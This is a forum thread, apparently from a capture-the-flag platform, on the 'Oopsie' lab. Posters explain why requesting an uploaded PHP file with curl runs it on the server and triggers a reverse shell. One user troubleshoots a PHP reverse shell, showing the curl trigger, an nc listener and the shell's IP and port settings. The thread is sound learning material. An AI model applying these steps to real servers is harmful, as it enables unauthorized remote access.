What does curl do in triggering a reverse shell in Oopsie

In the Starting Point Oopsie machine, a "curl http://10.10.10.28/uploads/???.php" is executed to trigger a reverse shell. I do not understand what curl does in this command. Does it force the server to run the php file???! Can anyone explain this?

Comments

  • Curl makes a request to the server. In this instance it requests ???.php.

    You could get the same outcome by visiting http://10.10.10.28/uploads/???.php in a browser.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • But why should the file be executed? Isn't it supposed to be something like an image? Why should the server run it?

  • @leihyunzhang said:

    But why should the file be executed?

    Well, that depends on what the file is.

    PHP is a server-side scripting language. If your server supports it, the code it contains is executed and the output returned to the user agent that requested it.

    Same with things like JSP.

    If you request a plain HTML file, nothing is executed as the file isn't processed - however there are exceptions such as embedded javascript and SSI, but this makes it a bit more complex.

    Isn't it supposed to be something like an image? Why should the server run it?

    Well, if it is an image the server wont run it - but having a .php extension means it is likely that the server will attempt to pre-process it before rendering its output. This obviously depends on how the server is configured but for a starting point CTF, I would assume that if it says it processes PHP, it processes PHP.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited October 8

    If you were to go into your terminal and type

    /bin/python3
    

    It would open the python interpreter. Likewise, going to /uploads/???.php would execute your shell. You are making calls to the file in both instances, just one is being done remotely.

    Thats kind of a simple explaination, Taz eludes to reasons files will not execute but it gives you the gist of it.

    Really what I am getting at is that a file can be called from a filepath if that is what you mean

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • Type your comment> @LMAY75 said:

    If you were to go into your terminal and type

    /bin/python3
    

    It would open the python interpreter. Likewise, going to /uploads/???.php would execute your shell. You are making calls to the file in both instances, just one is being done remotely.

    Thats kind of a simple explaination, Taz eludes to reasons files will not execute but it gives you the gist of it.

    Really what I am getting at is that a webserver is no different than your machine or mine. The only change is port 80 is exposed.

    I don't think this is a correct explanation. When we put something in address bar and press go, a GET request is sent. The server then handles it and returns the answer. It's not a command execution per se. It may, e.g., be a REST address without any corresponding files for it. What I expect is that what is under uploads folder is just downloaded without considering what type it is. But it seems that the server runs it if it is a php file. I assume that it is a mis-configuration of the server.

  • edited October 8

    Type your comment> @leihyunzhang said:

    Type your comment> @LMAY75 said:

    If you were to go into your terminal and type

    /bin/python3
    

    It would open the python interpreter. Likewise, going to /uploads/???.php would execute your shell. You are making calls to the file in both instances, just one is being done remotely.

    Thats kind of a simple explaination, Taz eludes to reasons files will not execute but it gives you the gist of it.

    Really what I am getting at is that a webserver is no different than your machine or mine. The only change is port 80 is exposed.

    I don't think this is a correct explanation. When we put something in address bar and press go, a GET request is sent. The server then handles it and returns the answer. It's not a command execution per se. It may, e.g., be a REST address without any corresponding files for it. What I expect is that what is under uploads folder is just downloaded without considering what type it is. But it seems that the server runs it if it is a php file. I assume that it is a mis-configuration of the server.

    As I said it is a gross oversimplification of what happens, however for a visual example provides a good enough representation at a basic level.

    It would also depend on what is being called. Sometimes through directory traversal it is possible to interact with executables directly.

    But yes, for a php file the execution is handled by php on the server. However that is not a misconfiguration php is behaving exactly as it should.

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • @leihyunzhang said:

    I don't think this is a correct explanation. When we put something in address bar and press go, a GET request is sent. The server then handles it and returns the answer. It's not a command execution per se.

    I agree with this clarification.

    It may, e.g., be a REST address without any corresponding files for it. What I expect is that what is under uploads folder is just downloaded without considering what type it is.

    "Downloaded" is a simplifcation. It is pre-processed, where the server takes the PHP bits and evaluates them, adding the output to the data returned as part of the HTTP response packets.

    But it seems that the server runs it if it is a php file. I assume that it is a mis-configuration of the server.

    Yeah I agree with @LMAY75 here. It would be unusual for a server to not process a PHP file before returning data, if it has been configured to process PHP.

    PHP, JSP, SSI (normally SHTML), ASP and a few other extensions are processed (or pre-processed) on the server before any data is returned to the client (browser, curl, wget, powershell, whatever).

    Files which use client-side execution (javascript etc) act slightly differently.

    If you request a PHP page and view source on the response, you are almost never going to see the actual PHP code. If you request a page with embedded JS, you can see the embeds and view the JS itself.

    Where it gets a bit muddy is if the server-side code contains a misconfiguration. Then you can have situations where the remote server code is triggering executable code on the filesystem. This getting a bit away from the original question.

    At a basic level, curl is just a way of interacting with a server - there are many you can pick from.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited October 8
    > @TazWake said:

    > Where it gets a bit muddy is if the server-side code contains a misconfiguration. Then you can have situations where the remote server code is triggering executable code on the filesystem. This getting a bit away from the original question.

    After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • @LMAY75 said:

    After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.

    Yeah - which curl is really good at as well :smile:

    A good example of making this confusing is using curl to trigger an LFI in a webserver which executes nc to get a shell.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited October 8

    Type your comment> @TazWake said:

    @LMAY75 said:

    After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.

    Yeah - which curl is really good at as well :smile:

    A good example of making this confusing is using curl to trigger an LFI in a webserver which executes nc to get a shell.

    Exactly, sorry to OP if I confused ya

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • 'Curl' - Client URL. Simple we can call it as a command line browser. We can use curl in CLI just like the browser in GUI.

    Hope this helps. :)

    A Chemist doing Penetration Testing - Check the Story here: BinaryBiceps

  • Type your comment> @LMAY75 said:

    Type your comment> @TazWake said:

    @LMAY75 said:

    After rereading everything I do agree that I gave a bad example. I originally interpreted his question as having more to do with the idea that scripts/programs/etc. can be called from a filepath.

    Yeah - which curl is really good at as well :smile:

    A good example of making this confusing is using curl to trigger an LFI in a webserver which executes nc to get a shell.

    Exactly, sorry to OP if I confused ya

    No Problem! :smile: Thank everyone for the information

  • edited November 15

    Can't get the reverse shell.

    curl http://10.10.10.28/uploads/phpsizifshell2.php
    WARNING: Failed to daemonise. This is quite common and not fatal.
    Connection refused (111)
    And
    nc -lvnp 1234
    listening on [any] 1234 ...

    File upload with chenging in
    $ip =
    $port =
    i can see it in DIRSEARCH
    python3 dirsearch.py -u http://10.10.10.28/uploads -e php -w worldlist.txt

    [14:21:57] Starting:
    [14:21:58] 200 - 92B - /uploads/phpsizifshell2.php

    UFW DISABLE

    IPTABLES:
    Chain INPUT(policy ACCEPT)
    ACCEPT tcp -- anywhere anywhere tcp dpt:http
    Chain FORWARD (policy ACCEPT)
    Chain OUTPUT (policy ACCEPT)

    NMAP:
    PORT STATE SERVICE
    1234/tcp open hotline

    NETSTAT :
    Proto::Recv-Q::Send-Q ::::::Local Address::Foreign Address::State:::::::PID/Program
    tcp________0 _______ 0____ 0.0.0.0:1234 ______ 0.0.0.0:* _____LISTEN _____5727/nc

    My experience is not enough to understand where the problem is or what i do mistake.
    I tried to turn off the proxy in Firefox but it not chenged nothing.
    Updating the VPN settings also did not give changes.

    !!! I would be grateful for a push in the right direction. !!!

  • So I assume you've used the pentestmonkey PHP reverse shell.

    The most probable cause of problems with this script is that the values for IP and port aren't correct.

    $ip = '127.0.0.1'; // CHANGE THIS
    $port = 1234; // CHANGE THIS

    Double-check the IP is the one you've been assigned by HTB (often found as tun0 but probably best confirmed on the access page). I'd also advise using a different port to reduce conflicting with other people who haven't bothered changing it.

    If the IP is correct then it could simply be down to a misconfiguration on the server.

    The error you've got is down to this if statement:
    if (function_exists('pcntl_fork')) {}

    So it appears that the function doesn't exist. It shouldn't break the shell.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Type your comment> @TazWake said:

    So I assume you've used the pentestmonkey PHP reverse shell.

    The most probable cause of problems with this script is that the values for IP and port aren't correct.

    $ip = '127.0.0.1'; // CHANGE THIS
    $port = 1234; // CHANGE THIS

    Double-check the IP is the one you've been assigned by HTB (often found as tun0 but probably best confirmed on the access page). I'd also advise using a different port to reduce conflicting with other people who haven't bothered changing it.

    If the IP is correct then it could simply be down to a misconfiguration on the server.

    The error you've got is down to this if statement:
    if (function_exists('pcntl_fork')) {}

    So it appears that the function doesn't exist. It shouldn't break the shell.

    I should have said that I tried playing with different port numbers before asking for help. Tried commenting out some of the code in the reversкshell.php which is responsible for starting daemonization then the answer is simply
    ""Connection refused (111)""
    I think the problem is with the sending command
    "curl http://10.10.10.28/uploads/my_file_name.php" from my machine to server.
    or server problem.
    I will try to do this operation from PWNBox.
    If all by OK - problem with my machine ,
    if i get server answer Connection refused (111)- problem on server side,
    is'nt it?

  • edited November 16

    It problem was on my machine.
    Helped:
    1) Restart Linux
    2) apt update apt upgrade
    3)Restart Linux
    4) iptables -F
    Then, the same actions as before led to the connection with the server from the first time.
    I took the flags.
    THANKS FOR PARTICIPATING !!!

Sign In to comment.